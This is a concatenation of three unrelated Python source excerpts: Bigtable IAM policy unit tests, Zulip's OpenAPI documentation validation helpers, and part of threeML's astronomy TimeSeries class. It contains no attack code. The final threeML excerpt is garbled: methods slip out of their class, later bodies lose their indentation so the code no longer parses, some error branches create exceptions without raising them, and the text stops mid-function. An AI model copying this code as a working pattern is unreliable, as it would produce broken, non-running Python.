    def test_ctor_explicit(self):
        etag = b"ETAG"
        version = 17
        policy = self._make_one(etag, version)
        self.assertEqual(policy.etag, etag)
        self.assertEqual(policy.version, version)
        self._check_empty_bindings(policy)
        self.assertEqual(len(policy), 0)
        self.assertEqual(dict(policy), {})

    def test_bigtable_admins_getter(self):
        from google.cloud.bigtable.policy import BIGTABLE_ADMIN_ROLE

        member = "user:phred@example.com"
        policy = self._make_one()
        policy[BIGTABLE_ADMIN_ROLE] = [member]
        self.assertEqual(policy.bigtable_admins, frozenset([member]))

    def test_bigtable_readers_getter(self):
        from google.cloud.bigtable.policy import BIGTABLE_READER_ROLE

        member = "user:phred@example.com"
        policy = self._make_one()
        policy[BIGTABLE_READER_ROLE] = [member]
        self.assertEqual(policy.bigtable_readers, frozenset([member]))

    def test_bigtable_users_getter(self):
        from google.cloud.bigtable.policy import BIGTABLE_USER_ROLE

        member = "user:phred@example.com"
        policy = self._make_one()
        policy[BIGTABLE_USER_ROLE] = [member]
        self.assertEqual(policy.bigtable_users, frozenset([member]))

    def test_bigtable_viewers_getter(self):
        from google.cloud.bigtable.policy import BIGTABLE_VIEWER_ROLE

        member = "user:phred@example.com"
        policy = self._make_one()
        policy[BIGTABLE_VIEWER_ROLE] = [member]
        self.assertEqual(policy.bigtable_viewers, frozenset([member]))

    def test_from_pb_empty(self):
        from google.iam.v1 import policy_pb2

        policy = self._get_target_class().from_pb(policy_pb2.Policy())
        self.assertEqual(policy.etag, b"")
        self.assertEqual(policy.version, 0)
        self._check_empty_bindings(policy)
        self.assertEqual(len(policy), 0)
        self.assertEqual(dict(policy), {})

    def test_from_pb_non_empty(self):
        from google.iam.v1 import policy_pb2
        from google.cloud.bigtable.policy import BIGTABLE_ADMIN_ROLE

        etag = b"ETAG"
        version = 17
        members = ["serviceAccount:service_acc1@test.com", "user:user1@test.com"]
        message = policy_pb2.Policy(
            etag=etag,
            version=version,
            bindings=[{"role": BIGTABLE_ADMIN_ROLE, "members": members}],
        )
        policy = self._get_target_class().from_pb(message)
        self.assertEqual(policy.etag, etag)
        self.assertEqual(policy.version, version)
        self.assertEqual(policy.bigtable_admins, set(members))
        nothing = frozenset()
        self.assertEqual(policy.bigtable_readers, nothing)
        self.assertEqual(policy.bigtable_users, nothing)
        self.assertEqual(policy.bigtable_viewers, nothing)
        self.assertEqual(len(policy), 1)
        self.assertEqual(dict(policy), {BIGTABLE_ADMIN_ROLE: set(members)})

    def test_to_pb_empty(self):
        from google.iam.v1 import policy_pb2

        policy = self._make_one()
        self.assertEqual(policy.to_pb(), policy_pb2.Policy())

    def test_to_pb_explicit(self):
        from google.iam.v1 import policy_pb2
        from google.cloud.bigtable.policy import BIGTABLE_ADMIN_ROLE

        etag = b"ETAG"
        version = 17
        members = ["serviceAccount:service_acc1@test.com", "user:user1@test.com"]
        policy = self._make_one(etag, version)
        policy[BIGTABLE_ADMIN_ROLE] = members
        expected = policy_pb2.Policy(
            etag=etag,
            version=version,
            bindings=[
                policy_pb2.Binding(role=BIGTABLE_ADMIN_ROLE, members=sorted(members))
            ],
        )
        self.assertEqual(policy.to_pb(), expected)

    def test_from_api_repr_wo_etag(self):
        version = 17
        policy = self._get_target_class().from_api_repr({"version": version})
        self.assertIsNone(policy.etag)
        self.assertEqual(policy.version, version)
        self._check_empty_bindings(policy)
        self.assertEqual(len(policy), 0)
        self.assertEqual(dict(policy), {})

    def test_from_api_repr_w_etag(self):
        import base64

        etag = b"ETAG"
        resource = {"etag": base64.b64encode(etag).decode("ascii")}
        policy = self._get_target_class().from_api_repr(resource)
        self.assertEqual(policy.etag, etag)
        self.assertIsNone(policy.version)
        self._check_empty_bindings(policy)
        self.assertEqual(len(policy), 0)
        self.assertEqual(dict(policy), {})

    def test_to_api_repr_wo_etag(self):
        version = 17
        policy = self._make_one(version=version)
        self.assertEqual(policy.to_api_repr(), {"version": version})

    def test_to_api_repr_w_etag(self):
        import base64

        etag = b"ETAG"
        policy = self._make_one(etag=etag)
        expected = {"etag": base64.b64encode(etag).decode("ascii")}
        self.assertEqual(policy.to_api_repr(), expected)
| |
# Zulip's OpenAPI-based API documentation system is documented at
# https://zulip.readthedocs.io/en/latest/documentation/api.html
#
# This file contains helper functions to interact with the OpenAPI
# definitions and validate that Zulip's implementation matches what is
# described in our documentation.
import json
import os
import re
from typing import Any, Dict, List, Mapping, Optional, Set, Tuple, Union
import orjson
from jsonschema.exceptions import ValidationError as JsonSchemaValidationError
from openapi_core import create_spec
from openapi_core.testing import MockRequest, MockResponse
from openapi_core.unmarshalling.schemas.exceptions import InvalidSchemaValue
from openapi_core.validation.request.validators import RequestValidator
from openapi_core.validation.response.validators import ResponseValidator
# Absolute path to the canonical OpenAPI description of the Zulip API.
OPENAPI_SPEC_PATH = os.path.abspath(
    os.path.join(os.path.dirname(__file__), "../openapi/zulip.yaml")
)

# A list of endpoint-methods such that the endpoint
# has documentation but not with this particular method.
EXCLUDE_UNDOCUMENTED_ENDPOINTS = {
    ("/realm/emoji/{emoji_name}", "delete"),
    ("/users", "patch"),
}
# Endpoints with some documentation remaining.  These are skipped by the
# validator, which reports them as valid because it cannot exclude
# individual objects.
EXCLUDE_DOCUMENTED_ENDPOINTS: Set[Tuple[str, str]] = set()
# Most of our code expects allOf to be preprocessed away because that is what
# yamole did. Its algorithm for doing so is not standards compliant, but we
# replicate it here.
def naively_merge(a: Dict[str, object], b: Dict[str, object]) -> Dict[str, object]:
    """Merge *b* into a copy of *a*, replicating yamole's semantics.

    A key present only in *b* (or named "example") takes *b*'s value;
    colliding lists are concatenated; colliding dicts are merged
    recursively; any other collision keeps *a*'s value.
    """
    merged: Dict[str, object] = a.copy()
    for key, new_value in b.items():
        if key != "example" and key in merged:
            old_value = merged[key]
            if isinstance(new_value, list):
                assert isinstance(old_value, list)
                merged[key] = old_value + new_value
            elif isinstance(new_value, dict):
                assert isinstance(old_value, dict)
                merged[key] = naively_merge(old_value, new_value)
            # Scalar collision: keep the value already in *a*.
        else:
            merged[key] = new_value
    return merged
def naively_merge_allOf(obj: object) -> object:
    """Recursively preprocess allOf away anywhere inside *obj*."""
    if isinstance(obj, list):
        return [naively_merge_allOf(item) for item in obj]
    if isinstance(obj, dict):
        return naively_merge_allOf_dict(obj)
    return obj
def naively_merge_allOf_dict(obj: Dict[str, object]) -> Dict[str, object]:
    """Fold any "allOf" list in *obj* into a single flat schema dict."""
    if "allOf" not in obj:
        # No allOf at this level; just recurse into the values.
        return {key: naively_merge_allOf(value) for key, value in obj.items()}
    rest = obj.copy()
    subschemas = rest.pop("allOf")
    assert isinstance(subschemas, list)
    merged = naively_merge_allOf_dict(rest)
    for subschema in subschemas:
        assert isinstance(subschema, dict)
        merged = naively_merge(merged, naively_merge_allOf_dict(subschema))
    return merged
class OpenAPISpec:
    """Lazily-loaded, mtime-cached wrapper around the OpenAPI YAML spec.

    Holds the allOf-flattened spec dict, a regex index of parameterized
    endpoint paths, and openapi_core request/response validators.
    """

    def __init__(self, openapi_path: str) -> None:
        self.openapi_path = openapi_path
        # mtime of the spec file at last successful load; None until then.
        self.mtime: Optional[float] = None
        self._openapi: Dict[str, Any] = {}
        self._endpoints_dict: Dict[str, str] = {}
        self._request_validator: Optional[RequestValidator] = None
        self._response_validator: Optional[ResponseValidator] = None

    def check_reload(self) -> None:
        # Because importing yaml takes significant time, and we only
        # use python-yaml for our API docs, importing it lazily here
        # is a significant optimization to `manage.py` startup.
        #
        # There is a bit of a race here...we may have two processes
        # accessing this module level object and both trying to
        # populate this object's state at the same time. Hopefully this
        # will only cause some extra processing at startup and not data
        # corruption.
        import yaml
        from jsonref import JsonRef

        with open(self.openapi_path) as f:
            mtime = os.fstat(f.fileno()).st_mtime
            # Using == rather than >= to cover the corner case of users placing an
            # earlier version than the current one
            if self.mtime == mtime:
                return

            openapi = yaml.load(f, Loader=yaml.CSafeLoader)

        spec = create_spec(openapi)
        self._request_validator = RequestValidator(spec)
        self._response_validator = ResponseValidator(spec)
        # Resolve $refs, then flatten allOf (see naively_merge_allOf_dict).
        self._openapi = naively_merge_allOf_dict(JsonRef.replace_refs(openapi))
        self.create_endpoints_dict()
        # Record mtime last, so a failure above leaves us marked stale.
        self.mtime = mtime

    def create_endpoints_dict(self) -> None:
        # Algorithm description:
        # We have 2 types of endpoints
        # 1.with path arguments 2. without path arguments
        # In validate_against_openapi_schema we directly check
        # if we have a without path endpoint, since it does not
        # require regex. Hence they are not part of the regex dict
        # and now we are left with only:
        # endpoint with path arguments.
        # Now for this case, the regex has been created carefully,
        # numeric arguments are matched with [0-9] only and
        # emails are matched with their regex. This is why there are zero
        # collisions. Hence if this regex matches
        # an incorrect endpoint then there is some backend problem.
        # For example if we have users/{name}/presence then it will
        # conflict with users/me/presence even in the backend.
        # Care should be taken though that if we have special strings
        # such as email they must be substituted with proper regex.

        email_regex = r"([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})"
        self._endpoints_dict = {}
        for endpoint in self._openapi["paths"]:
            if "{" not in endpoint:
                continue
            path_regex = "^" + endpoint + "$"
            # Numeric arguments have id at their end
            # so find such arguments and replace them with numeric
            # regex
            path_regex = re.sub(r"{[^}]*id}", r"[0-9]*", path_regex)
            # Email arguments end with email
            path_regex = re.sub(r"{[^}]*email}", email_regex, path_regex)
            # All other types of arguments are supposed to be
            # all-encompassing string.
            path_regex = re.sub(r"{[^}]*}", r"[^\/]*", path_regex)
            path_regex = path_regex.replace(r"/", r"\/")
            self._endpoints_dict[path_regex] = endpoint

    def openapi(self) -> Dict[str, Any]:
        """Reload the OpenAPI file if it has been modified after the last time
        it was read, and then return the parsed data.
        """
        self.check_reload()
        assert len(self._openapi) > 0
        return self._openapi

    def endpoints_dict(self) -> Dict[str, str]:
        """Reload the OpenAPI file if it has been modified after the last time
        it was read, and then return the parsed data.
        """
        self.check_reload()
        assert len(self._endpoints_dict) > 0
        return self._endpoints_dict

    def request_validator(self) -> RequestValidator:
        """Reload the OpenAPI file if it has been modified after the last time
        it was read, and then return the openapi_core validator object. Similar
        to preceding functions. Used for proper access to OpenAPI objects.
        """
        self.check_reload()
        assert self._request_validator is not None
        return self._request_validator

    def response_validator(self) -> ResponseValidator:
        """Reload the OpenAPI file if it has been modified after the last time
        it was read, and then return the openapi_core validator object. Similar
        to preceding functions. Used for proper access to OpenAPI objects.
        """
        self.check_reload()
        assert self._response_validator is not None
        return self._response_validator
class SchemaError(Exception):
    """Raised when request/response content disagrees with the OpenAPI spec."""

    pass
# Shared spec instance used by all helper functions below; it re-reads the
# YAML file on demand (see check_reload in OpenAPISpec).
openapi_spec = OpenAPISpec(OPENAPI_SPEC_PATH)
def get_schema(endpoint: str, method: str, status_code: str) -> Dict[str, Any]:
    """Return the response schema for (endpoint, method, status_code).

    status_code is either a plain 3-digit code ("200") or a code with a
    subschema index appended ("200_0") selecting one variant of a oneOf
    schema.  A plain code whose schema is a oneOf maps to its first variant,
    since such variants currently only differ in their examples.
    """
    responses = openapi_spec.openapi()["paths"][endpoint][method.lower()]["responses"]
    if len(status_code) == 3 and (
        "oneOf" in responses[status_code]["content"]["application/json"]["schema"]
    ):
        # Currently at places where multiple schemas are defined they only
        # differ in example so either can be used.
        status_code += "_0"
    if len(status_code) == 3:
        return responses[status_code]["content"]["application/json"]["schema"]
    # "NNN_i": select subschema i of the oneOf list.  Slicing ([4:], not [4])
    # keeps this correct if an endpoint ever has 10+ variants.
    subschema_index = int(status_code[4:])
    status_code = status_code[0:3]
    return responses[status_code]["content"]["application/json"]["schema"]["oneOf"][
        subschema_index
    ]
def get_openapi_fixture(endpoint: str, method: str, status_code: str = "200") -> Dict[str, Any]:
    """Return the example fixture attached to the response schema."""
    schema = get_schema(endpoint, method, status_code)
    return schema["example"]
def get_openapi_fixture_description(endpoint: str, method: str, status_code: str = "200") -> str:
    """Fetch a fixture's description from the full spec object."""
    return get_schema(endpoint, method, status_code)["description"]
def get_curl_include_exclude(endpoint: str, method: str) -> List[Dict[str, Any]]:
    """Fetch all the kinds of parameters required for curl examples."""
    operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
    if "x-curl-examples-parameters" not in operation:
        # Default: a single example excluding nothing.
        return [{"type": "exclude", "parameters": {"enum": [""]}}]
    return operation["x-curl-examples-parameters"]["oneOf"]
def check_requires_administrator(endpoint: str, method: str) -> bool:
    """Fetch if the endpoint requires admin config."""
    operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
    return operation.get("x-requires-administrator", False)
def check_additional_imports(endpoint: str, method: str) -> Optional[List[str]]:
    """Fetch the additional imports required for an endpoint."""
    operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
    return operation.get("x-python-examples-extra-imports", None)
def get_responses_description(endpoint: str, method: str) -> str:
    """Fetch responses description of an endpoint."""
    operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
    return operation.get("x-response-description", "")
def get_parameters_description(endpoint: str, method: str) -> str:
    """Fetch parameters description of an endpoint."""
    operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
    return operation.get("x-parameter-description", "")
def generate_openapi_fixture(endpoint: str, method: str) -> List[str]:
    """Render the example fixtures for every documented response as
    Markdown lines (description followed by a fenced JSON block)."""
    fixture: List[str] = []
    responses = openapi_spec.openapi()["paths"][endpoint][method.lower()]["responses"]
    for status_code in sorted(responses):
        schema = responses[status_code]["content"]["application/json"]["schema"]
        # A oneOf schema yields one fixture per variant.
        subschema_count = len(schema["oneOf"]) if "oneOf" in schema else 1
        for subschema_index in range(subschema_count):
            if subschema_count == 1:
                subschema_status_code = status_code
            else:
                subschema_status_code = status_code + "_" + str(subschema_index)
            description = get_openapi_fixture_description(
                endpoint, method, subschema_status_code
            ).strip()
            fixture_json = json.dumps(
                get_openapi_fixture(endpoint, method, subschema_status_code),
                indent=4,
                sort_keys=True,
                separators=(",", ": "),
            )
            fixture.extend(description.splitlines())
            fixture.append("``` json")
            fixture.extend(fixture_json.splitlines())
            fixture.append("```")
    return fixture
def get_openapi_description(endpoint: str, method: str) -> str:
    """Fetch a description from the full spec object."""
    operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
    return operation["description"]
def get_openapi_summary(endpoint: str, method: str) -> str:
    """Fetch a summary from the full spec object."""
    operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
    return operation["summary"]
def get_endpoint_from_operationid(operationid: str) -> Tuple[str, str]:
    """Map an operationId back to its (endpoint, method) pair."""
    paths = openapi_spec.openapi()["paths"]
    for endpoint, operations in paths.items():
        for method, operation in operations.items():
            if operation.get("operationId") == operationid:
                return (endpoint, method)
    raise AssertionError("No such page exists in OpenAPI data.")
def get_openapi_paths() -> Set[str]:
    """Return the set of all documented URL patterns."""
    return {path for path in openapi_spec.openapi()["paths"]}
def get_openapi_parameters(
    endpoint: str, method: str, include_url_parameters: bool = True
) -> List[Dict[str, Any]]:
    """Return the declared parameters for an operation, optionally
    filtering out the ones that live in the URL path."""
    operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
    # We do a `.get()` for this last bit to distinguish documented
    # endpoints with no parameters (empty list) from undocumented
    # endpoints (KeyError exception).
    parameters = operation.get("parameters", [])
    if include_url_parameters:
        return parameters
    # Also, we skip parameters defined in the URL.
    return [parameter for parameter in parameters if parameter["in"] != "path"]
def get_openapi_return_values(endpoint: str, method: str) -> Dict[str, Any]:
    """Return the documented properties of an operation's 200 response."""
    operation = openapi_spec.openapi()["paths"][endpoint][method.lower()]
    response_schema = operation["responses"]["200"]["content"]["application/json"]["schema"]
    # In cases where we have used oneOf, the schemas only differ in examples,
    # so the first variant serves as well as any other.
    chosen = response_schema["oneOf"][0] if "oneOf" in response_schema else response_schema
    return chosen["properties"]
def find_openapi_endpoint(path: str) -> Optional[str]:
    """Return the documented endpoint whose URL pattern matches path, if any."""
    for path_regex, endpoint in openapi_spec.endpoints_dict().items():
        if re.match(path_regex, path) is not None:
            return endpoint
    return None
def get_event_type(event: Dict[str, Any]) -> str:
    """Build the "type:op" key identifying an event's schema variant."""
    op = event.get("op", "")
    return event["type"] + ":" + op
def fix_events(content: Dict[str, Any]) -> None:
    """Remove undocumented events from events array. This is a makeshift
    function so that further documentation of `/events` can happen with
    only zulip.yaml changes and minimal other changes. It should be removed
    as soon as `/events` documentation is complete.
    """
    # 'user' is deprecated so remove its occurrences from the events array
    for event in content["events"]:
        if "user" in event:
            del event["user"]
def prune_type_schema_by_type(schema: Dict[str, Any], type: str) -> bool:
    """Return True if this "type"-field schema cannot match the given
    event type (so the enclosing variant can be pruned from error output)."""
    if "enum" in schema and type not in schema["enum"]:
        return True
    if "allOf" in schema:
        return any(
            prune_type_schema_by_type(subschema, type) for subschema in schema["allOf"]
        )
    return False
def prune_schema_by_type(schema: Dict[str, Any], type: str) -> bool:
    """Return True if this event schema cannot describe an event of the
    given type, checking its "type" property and any allOf components."""
    properties = schema.get("properties", {})
    if "type" in properties and prune_type_schema_by_type(properties["type"], type):
        return True
    if "allOf" in schema:
        return any(prune_schema_by_type(subschema, type) for subschema in schema["allOf"])
    return False
def validate_against_openapi_schema(
    content: Dict[str, Any],
    path: str,
    method: str,
    status_code: str,
    display_brief_error: bool = False,
) -> bool:
    """Compare a "content" dict with the defined schema for a specific method
    in an endpoint. Return true if validated and false if skipped.

    :param content: decoded JSON response body to validate
    :param path: URL path of the request (without the /api/v1 prefix)
    :param method: HTTP method name
    :param status_code: HTTP status code of the response, as a string
    :param display_brief_error: prune non-matching oneOf variants from the
        validation error output to keep it readable
    :raises SchemaError: if the response does not match the documented schema
    """
    # This first set of checks are primarily training wheels that we
    # hope to eliminate over time as we improve our API documentation.

    # No 500 responses have been documented, so skip them
    if status_code.startswith("5"):
        return False
    if path not in openapi_spec.openapi()["paths"].keys():
        endpoint = find_openapi_endpoint(path)
        # If it doesn't match it hasn't been documented yet.
        if endpoint is None:
            return False
    else:
        endpoint = path
    # Excluded endpoint/methods
    if (endpoint, method) in EXCLUDE_UNDOCUMENTED_ENDPOINTS:
        return False
    # Return true for endpoints with only response documentation remaining
    if (endpoint, method) in EXCLUDE_DOCUMENTED_ENDPOINTS:
        return True
    # Check if the response matches its code
    if status_code.startswith("2") and (content.get("result", "success").lower() != "success"):
        raise SchemaError("Response is not 200 but is validating against 200 schema")
    # Code is not declared but appears in various 400 responses. If
    # common, it can be added to 400 response schema
    if status_code.startswith("4"):
        # This return statement should ideally be not here. But since
        # we have not defined 400 responses for various paths this has
        # been added as all 400 have the same schema. When all 400
        # response have been defined this should be removed.
        return True
    if endpoint == "/events" and method == "get":
        # This a temporary function for checking only documented events
        # as all events haven't been documented yet.
        # TODO: Remove this after all events have been documented.
        fix_events(content)
    mock_request = MockRequest("http://localhost:9991/", method, "/api/v1" + path)
    mock_response = MockResponse(
        # TODO: Use original response content instead of re-serializing it.
        orjson.dumps(content),
        status_code=status_code,
    )
    result = openapi_spec.response_validator().validate(mock_request, mock_response)
    try:
        result.raise_for_errors()
    except InvalidSchemaValue as isv:
        message = f"{len(isv.schema_errors)} response validation error(s) at {method} /api/v1{path} ({status_code}):"
        for error in isv.schema_errors:
            if display_brief_error:
                # display_brief_error is designed to avoid printing 1000 lines
                # of output when the schema to validate is extremely large
                # (E.g. the several dozen format variants for individual
                # events returned by GET /events) and instead just display the
                # specific variant we expect to match the response.
                brief_error_validator_value = [
                    validator_value
                    for validator_value in error.validator_value
                    if not prune_schema_by_type(validator_value, error.instance["type"])
                ]
                brief_error_display_schema = error.schema.copy()
                if "oneOf" in brief_error_display_schema:
                    brief_error_display_schema["oneOf"] = [
                        i_schema
                        for i_schema in error.schema["oneOf"]
                        if not prune_schema_by_type(i_schema, error.instance["type"])
                    ]
                # Field list from https://python-jsonschema.readthedocs.io/en/stable/errors/
                # Rebuild the error with the pruned schema/validator_value.
                error = JsonSchemaValidationError(
                    message=error.message,
                    validator=error.validator,
                    path=error.path,
                    instance=error.instance,
                    schema_path=error.schema_path,
                    schema=brief_error_display_schema,
                    validator_value=brief_error_validator_value,
                    cause=error.cause,
                )
            message += f"\n\n{type(error).__name__}: {error}"
        raise SchemaError(message) from None
    return True
def validate_schema(schema: Dict[str, Any]) -> None:
    """Check if opaque objects are present in the OpenAPI spec; this is an
    important part of our policy for ensuring every detail of Zulip's
    API responses is correct.

    Recurses through oneOf variants, array items, and object properties,
    requiring every object schema to declare `additionalProperties`.
    """
    if "oneOf" in schema:
        for subschema in schema["oneOf"]:
            validate_schema(subschema)
        return
    schema_type = schema["type"]
    if schema_type == "array":
        validate_schema(schema["items"])
    elif schema_type == "object":
        if "additionalProperties" not in schema:
            raise SchemaError(
                "additionalProperties needs to be defined for objects to make "
                + "sure they have no additional properties left to be documented."
            )
        for property_schema in schema.get("properties", {}).values():
            validate_schema(property_schema)
        if schema["additionalProperties"]:
            validate_schema(schema["additionalProperties"])
def likely_deprecated_parameter(parameter_description: str) -> bool:
    """Heuristically detect whether a description marks its parameter as
    deprecated (either via a **Changes** note or an explicit tag)."""
    markers = ("**Changes**: Deprecated", "**Deprecated**")
    return any(marker in parameter_description for marker in markers)
def check_deprecated_consistency(argument: Mapping[str, Any], description: str) -> None:
    """Assert that the `deprecated` flag and the description's deprecation
    wording agree with each other, in both directions."""
    description_says_deprecated = likely_deprecated_parameter(description)
    if description_says_deprecated:
        assert argument["deprecated"]
    if "deprecated" in argument:
        assert description_says_deprecated
# Skip those JSON endpoints whose query parameters are different from
# their `/api/v1` counterpart. This is a legacy code issue that we
# plan to fix by changing the implementation.
# Entries are (url, lowercase HTTP method) pairs.
SKIP_JSON = {
    ("/fetch_api_key", "post"),
}
def validate_request(
    url: str,
    method: str,
    data: Union[str, bytes, Dict[str, Any]],
    http_headers: Dict[str, str],
    json_url: bool,
    status_code: str,
    intentionally_undocumented: bool = False,
) -> None:
    """Validate a test-suite HTTP request against the OpenAPI spec.

    :param url: request URL path (without the /api/v1 or /json prefix)
    :param method: HTTP method name
    :param data: request body or query parameters
    :param http_headers: request headers
    :param json_url: True if the request used the legacy /json/ prefix
    :param status_code: status code the server returned, as a string
    :param intentionally_undocumented: suppress errors for requests that
        are deliberately not documented in the OpenAPI spec
    :raises SchemaError: if the request does not conform to the spec
    """
    # Some JSON endpoints have different parameters compared to
    # their `/api/v1` counterparts.
    if json_url and (url, method) in SKIP_JSON:
        return
    # TODO: Add support for file upload endpoints that lack the /json/
    # or /api/v1/ prefix.
    if url == "/user_uploads" or url.startswith("/realm/emoji/"):
        return
    # Now using the openapi_core APIs, validate the request schema
    # against the OpenAPI documentation.
    mock_request = MockRequest(
        "http://localhost:9991/", method, "/api/v1" + url, headers=http_headers, args=data
    )
    result = openapi_spec.request_validator().validate(mock_request)
    if len(result.errors) != 0:
        # Requests that do not validate against the OpenAPI spec must either:
        # * Have returned a 400 (bad request) error
        # * Have returned a 200 (success) with this request marked as intentionally
        # undocumented behavior.
        if status_code.startswith("4"):
            return
        if status_code.startswith("2") and intentionally_undocumented:
            return
    # If no errors are raised, then validation is successful
    # NOTE(review): this check could be folded into the branch above; the two
    # `len(result.errors)` tests partition the same condition.
    if len(result.errors) == 0:
        return
    # Show a block error message explaining the options for fixing it.
    msg = f"""
Error! The OpenAPI schema for {method} {url} is not consistent
with the parameters passed in this HTTP request.  Consider:
* Updating the OpenAPI schema defined in zerver/openapi/zulip.yaml
* Adjusting the test to pass valid parameters.  If the test
fails due to intentionally_undocumented features, you need to pass
`intentionally_undocumented=True` to self.client_{method.lower()} or
self.api_{method.lower()} to document your intent.
See https://zulip.readthedocs.io/en/latest/documentation/api.html for help.
The errors logged by the OpenAPI validator are below:\n"""
    for error in result.errors:
        msg += f"* {str(error)}\n"
    raise SchemaError(msg)
| |
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import range
from builtins import object
from past.utils import old_div
__author__ = "grburgess"
import collections
import os
import numpy as np
import pandas as pd
from pandas import HDFStore
from threeML.exceptions.custom_exceptions import custom_warnings
from threeML.io.file_utils import sanitize_filename
from threeML.utils.spectrum.binned_spectrum import Quality
from threeML.utils.time_interval import TimeIntervalSet
from threeML.utils.time_series.polynomial import polyfit, unbinned_polyfit, Polynomial
class ReducingNumberOfThreads(Warning):
    """Warning issued when the requested thread count has to be reduced."""

    pass


class ReducingNumberOfSteps(Warning):
    """Warning issued when the requested number of steps has to be reduced."""

    pass


class OverLappingIntervals(RuntimeError):
    """Raised when time-interval selections overlap each other."""

    pass
# find out how many splits we need to make
def ceildiv(a, b):
    """Integer ceiling division: smallest integer >= a / b."""
    return -(a // -b)
class TimeSeries(object):
    def __init__(
        self,
        start_time,
        stop_time,
        n_channels,
        native_quality=None,
        first_channel=1,
        ra=None,
        dec=None,
        mission=None,
        instrument=None,
        verbose=True,
        edges=None,
    ):
        """
        The EventList is a container for event data that is tagged in time and in PHA/energy. It handles event selection,
        temporal polynomial fitting, temporal binning, and exposure calculations (in subclasses). Once events are selected
        and/or polynomials are fit, the selections can be extracted via a PHAContainer which is can be read by an OGIPLike
        instance and translated into a PHA instance.
        :param n_channels: Number of detector channels
        :param start_time: start time of the event list
        :param stop_time: stop time of the event list
        :param first_channel: where detchans begin indexing
        :param rsp_file: the response file corresponding to these events
        :param arrival_times: list of event arrival times
        :param energies: list of event energies or pha channels
        :param native_quality: native pha quality flags
        :param edges: The histogram boundaries if not specified by a response
        :param mission:
        :param instrument:
        :param verbose:
        :param ra:
        :param dec:
        """
        self._verbose = verbose
        self._n_channels = n_channels
        self._first_channel = first_channel
        self._native_quality = native_quality
        # we haven't made selections yet
        self._time_intervals = None
        self._poly_intervals = None
        self._counts = None
        self._exposure = None
        self._poly_counts = None
        self._poly_count_err = None
        self._poly_selected_counts = None
        self._poly_exposure = None
        # ebounds for objects w/o a response
        self._edges = edges
        if native_quality is not None:
            assert len(native_quality) == n_channels, (
                "the native quality has length %d but you specified there were %d channels"
                % (len(native_quality), n_channels)
            )
        self._start_time = start_time
        self._stop_time = stop_time
        # name the instrument if there is not one
        if instrument is None:
            custom_warnings.warn("No instrument name is given. Setting to UNKNOWN")
            self._instrument = "UNKNOWN"
        else:
            self._instrument = instrument
        if mission is None:
            custom_warnings.warn("No mission name is given. Setting to UNKNOWN")
            self._mission = "UNKNOWN"
        else:
            self._mission = mission
        # -1 means "determine the polynomial order automatically"
        self._user_poly_order = -1
        self._time_selection_exists = False
        self._poly_fit_exists = False
        self._fit_method_info = {"bin type": None, "fit method": None}
def set_active_time_intervals(self, *args):
    """Select the intervals of data to analyze; must be implemented by subclasses."""
    raise RuntimeError("Must be implemented in subclass")
@property
def poly_fit_exists(self):
    # True once a background polynomial fit has been performed.
    return self._poly_fit_exists

@property
def n_channels(self):
    # Number of detector (PHA) channels.
    return self._n_channels

@property
def poly_intervals(self):
    # TimeIntervalSet used for the background fit (None before selection).
    return self._poly_intervals
@property
def polynomials(self):
""" Returns polynomial is they exist"""
if self._poly_fit_exists:
return self._polynomials
else:
RuntimeError("A polynomial fit has not been made.")
def get_poly_info(self):
"""
Return a pandas panel frame with the polynomial coeffcients
and errors
Returns:
a DataFrame
"""
if self._poly_fit_exists:
coeff = []
err = []
for poly in self._polynomials:
coeff.append(poly.coefficients)
err.append(poly.error)
df_coeff = pd.DataFrame(coeff)
df_err = pd.DataFrame(err)
# print('Coefficients')
#
# display(df_coeff)
#
# print('Coefficient Error')
#
# display(df_err)
pan = {"coefficients": df_coeff, "error": df_err}
return pan
else:
RuntimeError("A polynomial fit has not been made.")
def get_total_poly_count(self, start, stop, mask=None):
"""
Get the total poly counts
:param start:
:param stop:
:return:
"""
if mask is None:
mask = np.ones_like(self._polynomials, dtype=np.bool)
total_counts = 0
for p in np.asarray(self._polynomials)[mask]:
total_counts += p.integral(start, stop)
return total_counts
def get_total_poly_error(self, start, stop, mask=None):
"""
Get the total poly error
:param start:
:param stop:
:return:
"""
if mask is None:
mask = np.ones_like(self._polynomials, dtype=np.bool)
total_counts = 0
for p in np.asarray(self._polynomials)[mask]:
total_counts += p.integral_error(start, stop) ** 2
return np.sqrt(total_counts)
@property
def bins(self):
if self._temporal_binner is not None:
return self._temporal_binner
else:
raise RuntimeError("This EventList has no binning specified")
def __set_poly_order(self, value):
""" Set poly order only in allowed range and redo fit """
assert type(value) is int, "Polynomial order must be integer"
assert (
-1 <= value <= 4
), "Polynomial order must be 0-4 or -1 to have it determined"
self._user_poly_order = value
if self._poly_fit_exists:
print(
"Refitting background with new polynomial order (%d) and existing selections"
% value
)
if self._time_selection_exists:
self.set_polynomial_fit_interval(
*self._poly_intervals.to_string().split(","),
unbinned=self._unbinned
)
else:
RuntimeError("This is a bug. Should never get here")
def ___set_poly_order(self, value):
    """ Indirect poly order setter """
    # Indirection lets subclasses override the name-mangled setter cleanly.
    self.__set_poly_order(value)

def __get_poly_order(self):
    """ get the poly order """
    return self._optimal_polynomial_grade

def ___get_poly_order(self):
    """ Indirect poly order getter """
    return self.__get_poly_order()

# Public property wired to the indirect getter/setter above.
poly_order = property(
    ___get_poly_order, ___set_poly_order, doc="Get or set the polynomial order"
)

@property
def time_intervals(self):
    """
    the time intervals of the events
    :return:
    """
    return self._time_intervals
def exposure_over_interval(self, tmin, tmax):
    """ calculate the exposure over a given interval; implemented by subclasses """
    raise RuntimeError("Must be implemented in sub class")

def counts_over_interval(self, start, stop):
    """
    return the number of counts in the selected interval
    :param start: start of interval
    :param stop: stop of interval
    :return:
    """
    # this will be a boolean list and the sum will be the
    # number of events
    raise RuntimeError("Must be implemented in sub class")

def count_per_channel_over_interval(self, start, stop):
    """
    Return the counts per channel over the interval; implemented by subclasses.
    :param start: start of interval
    :param stop: stop of interval
    :return:
    """
    raise RuntimeError("Must be implemented in sub class")
def set_polynomial_fit_interval(self, *time_intervals, **options):
